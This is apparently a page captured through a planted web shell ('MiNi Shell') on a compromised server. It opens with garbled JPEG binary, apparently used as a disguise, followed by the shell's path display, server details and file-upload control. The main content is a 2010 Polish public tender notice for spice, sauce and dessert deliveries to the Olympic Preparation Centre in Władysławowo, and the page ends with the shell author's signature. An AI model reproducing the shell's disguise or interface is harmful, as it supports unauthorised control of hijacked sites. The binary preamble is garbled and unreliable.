JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/211201-N-2010.html

<p class="kh_header"><b>Władysławowo: Dostawy sukcesywne przypraw, sosów i półproduktów  do Ośrodka Przygotowań Olimpijskich we Władysławowie</b><br>
<b>Numer ogłoszenia: 211201 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Budżetowy Ministerstwa Sportu i Turystyki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sukcesywne przypraw, sosów i półproduktów  do Ośrodka Przygotowań Olimpijskich we Władysławowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy sukcesywne przypraw, sosów i półproduktów  do Ośrodka Przygotowań Olimpijskich we Władysławowie. 1.	ROSÓŁ WOŁOWY (w paście) - kg	5
2.	ROSÓŁ Z KURY (w paście) - kg	5
3.	BULION GRZYBOWY (w paście) -  kg	5
4.	ZUPA CEBULOWA  -  kg	5
5.	ŻUREK  - kg	5
6.	ZUPA KREM Z BOROWIKÓW - kg	3
7.	ZUPA SZPARAGOWA - kg	4
8.	ZUPA KREM Z PIECZAREK -kg	10
9.	ZUPA KREM ZE SZPINAKU  -  kg	5
10.	ZUPA TOSKAŃSKA  -kg	4
11.	BARSZCZ BIAŁY  - kg	10
12.	BARSZCZ CZERWONY  - kg	10
13.	ZUPA BROKUŁOWA  - kg	5
14.	ZUPA KALAFIOROWA  - kg	5
15.	SOS PIECZENIOWY kg	15
16.	SOS CZTERY SERY Z BROKUŁAMI -kg	4
17.	SOS CAFE DE PARIS  -                                        	kg	4
18.	SOS SŁODKI CHILI - kg	3
19.	SOS CYTRYNOWO-MAŚLANY -kg	4
20.	SOS GRZYBOWY - kg	5
21.	SOS CHILI SŁODKO-PIKANTNY - kg	4
22.	SOS PIECZARKOWO-BOROWIKOWY -  	kg	3
23.	PROFESSIONAL PAPRYKA KNORR (PUREE) -kg	3
24.	PROFESSIONAL PIEPRZ KOLOROWY KNORR (PUREE) -kg	3
25.	ZIOŁA PROWANSALSKIE -kg	3
26.	BAZYLIA -kg	7
27.	Rosół z kury - kg	12
28.	FIX DO GULASZU - kg	10
29.	FIX DO POTRAW CHIŃKICH -   kg	3
30.	FIX DO POTRAW MEKSYKAŃSKICH - kg	3
31.	DELIKAT DO RYB - kg	10
32.	SOS DO SPAGHETTI BOLOGNESE - kg	5
33.	PIEPRZ KOLOROWY MŁOTKOWANY -kg	4
34.	ROSÓŁ JARZYNOWY -  kg	6
35.	SOS SAŁATKOWY, CZOSNKOWY                                        	kg	4
36.	SOS SAŁATKOWY, KOPERKOWY -  kg	3
37.	SOS SAŁATKOWY, OGRODOWY -kg	3
38.	SOS SAŁATKOWY, WŁOSKI - kg	3
39.	SOS SAŁATKOWY, MEKSYKAŃSKI - kg	2
40.	SOS SAŁATKOWY, GRECKI - 	kg	3
41.	VINAIGRETTE PROFESSIONA -  litr	5
42.	TOMATO PRONTO - 	kg	35
43.	KONCENTRAT POMIDOROWY 30% -  	kg	150
44.	PRIMERBA  BAZYLIOWA - kg	2
45.	PRIMERBA  CZOSNKOWA -kg	3
46.	PRIMERBA  CZERWONE PESTO - kg	3
47.	PRIMERBA  GRZYBOWA -  kg	2
48.	PRIMERBA  KOPERKOWA - kg	3
49.	PRIMERBA  PESTO -    	kg	3
50.	PRIMERBA  PROWANSALSKA - kg	2
51.	MARYNATA PREMIUM - kg	4
52.	ROZMARYN - kg	2
53.	AROMA MIX, MAŚLANO-ZIOŁOWY-   kg	3
54.	MARYNATA PREMIUM-kg	4
55.	MARYNATA PREMIUM-    kg	8
56.	MARYNATA PREMIUM-   	kg	5
57.	SOS SAŁATKOWY BAZYLIOWO -CZOSNKOWY-kg	3
58.	ESENCJA Z WOŁOWINY LUB KURY, LUB CIELĘCINY-  litr	8
59.	AUSZPIK-opakowanie eurokontener maksimum  kg	25
60.	CZOSNEK GRANULOWANY- kg	3
61.	Sos sojowy ciemny - 	litr	2
62.	MAJERANEK SUSZONY- kg	18
63.	TYMIANEK - kg	2
64.	KURKUMA - kg	2
65.	PAPRYKA SŁODKA, MIELONA - kg	5
66.	PIEPRZ BIAŁY, MIELONY-  	kg	5
67.	PIEPRZ CZARNY, MIELONY-kg	12
68.	LIŚĆ LAUROWY opakowanie  100 g firmy KAMIS	kg	2
69.	PIEPRZ CZARNY, CAŁY- kg	5
70.	PIEPRZ KOLOROWY, CAŁY-  	4
71.	ZIELE ANGIELSKIE- kg	4
72.	GRZANKI ZIOŁOWO-CZOSNKOWE- kg	10
73.	GROSZEK PTYSIOWY- kg	10
74.	SÓL WARZONA JODOWANA  -kg	250
75.	VEGETA -przyprawa kg	100
76.	Cynamon mielony - 	kg	1
77.	Przyprawa Curry - 	kg	1
78.	MARYNATA STAROPOLSKA kg	4
79.	Przyprawa do flaków - kg	3
80.	Sól zmiękczająca mięso - kg	5
81.	Imbir różowy do sushi -	kg	3
82.	Zakwas do żurku - litr	100
83.	WANILIA LASKA - 	szt	5
84.	CHILI - kg	2
85.	Sos BARBECUE- s	kg	5
86.	SOS Z CZERWONEJ CEBULI - kg	2
87.	Goździki - 	kg	1
88.	Delikat przyprawa w płynie - 	kg	100
89.	Liście NORI - szt.	2
90.	Ocet ryżowy - 	litr	2
91.	Pasta VASABI - 50g 	kg	0,5
92.	Pieprz zielony w zalewie - 	kg	2
93.	Papryka mielona ostra - kg	2
94.	Kapary w zalewie - kg	2
95.	Owoc jałowca - 	kg	1
96.	Gruboziarnista posypka do mięś - kg	2
97.	Cebula smażona - 	kg	1
98.	Przyprawa do frytek - firmy KAMIS	kg	2
99.	Panierka do drobiu - 	kg	5
100.	SOS HOLENDERSKI - 	kg	5
101.	SOS PIEPRZOWY - kg	5
102.	SOS SEROWY- kg	8
103.	MUS CZEKOLADOWY -kg	30
104.	MUS JOGURTOWY-kg	30
105.	MUS ZABAJONE - kg	25
106.	PANNA COTTA - kg	25
107	POLEWY OWOCOWE DO DESERÓW  -kg	15
108.	TIRAMISU -kg	25
Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity  Dz. U. z 2010 Nr 113, poz. 759)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.24.00-5, 15.87.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oswiadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity  Dz. U. z 2010 Nr 113, poz. 759).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawcy wykonali lub wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia dotyczące dostaw przypraw, sosów i półproduktów  o wartości brutto (na jedno zamówienie, umowę, kontrakt, w okresie maksymalnie 6 miesięcy) nie mniejszej niż 15 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oswiadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity  Dz. U. z 2010 Nr 113, poz. 759).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oswiadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity  Dz. U. z 2010 Nr 113, poz. 759).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oswiadczenia z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity  Dz. U. z 2010 Nr 113, poz. 759).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 6 miesięcy od dnia podpisania niniejszej umowy kwota określona w ust. 1 pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych). 
3.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji.
4.	W przypadku zmiany przez producenta wielkości opakowania, w jakim jest dostarczany dany produkt Wykonawca powinien powiadomić o tym fakcie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 11:00, miejsce: Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo: SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com